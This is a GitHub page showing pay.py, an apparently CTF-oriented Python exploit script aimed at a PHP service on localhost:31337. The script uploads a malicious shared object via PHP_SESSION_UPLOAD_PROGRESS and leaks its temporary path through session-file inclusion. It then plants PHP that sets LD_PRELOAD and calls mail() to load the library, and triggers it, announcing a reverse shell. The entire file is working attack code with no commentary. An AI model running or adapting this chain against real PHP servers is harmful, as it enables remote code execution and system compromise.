-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpay.py
53 lines (43 loc) · 1.34 KB
/
pay.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import requests
def attack1():
HOST = 'http://localhost:31337/?chance=$r="a";$r["a"];&mode=chance'
headers = {
'Connection': 'close',
'Cookie': 'PHPSESSID=pay1',
}
data = {'PHP_SESSION_UPLOAD_PROGRESS': 'preloooad'}
pay = open("pay.so","rb")
try:
requests.post(HOST, headers=headers, files={'f':pay}, data=data)
print("Something is wrong..?")
except:
pay.close()
print("Upload Done")
def attack2(lib):
HOST = 'http://localhost:31337/'
headers = {
'Connection': 'close',
'Cookie': 'PHPSESSID=pay2',
}
data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php putenv("LD_PRELOAD=%s"); mail("","","","");?>'%(lib)}
requests.post(HOST, headers=headers, files={'f':"dummy"}, data=data)
print("Payload setting done")
def attack3():
print("Trying reverse shell")
HOST = 'http://localhost:31337/?bonus=/var/lib/php/sessions/sess_pay2'
conn = requests.get(HOST)
def leak():
HOST = 'http://localhost:31337/?bonus=/var/lib/php/sessions/sess_pay1'
conn = requests.get(HOST)
parsed = conn.text
parsed = parsed[parsed.index('/tmp'):]
parsed = parsed[:parsed.index("\"")]
return parsed
def exploit():
attack1()
lib = leak()
print("[*] Leak:",lib)
attack2(lib)
attack3()
if __name__ == "__main__":
exploit()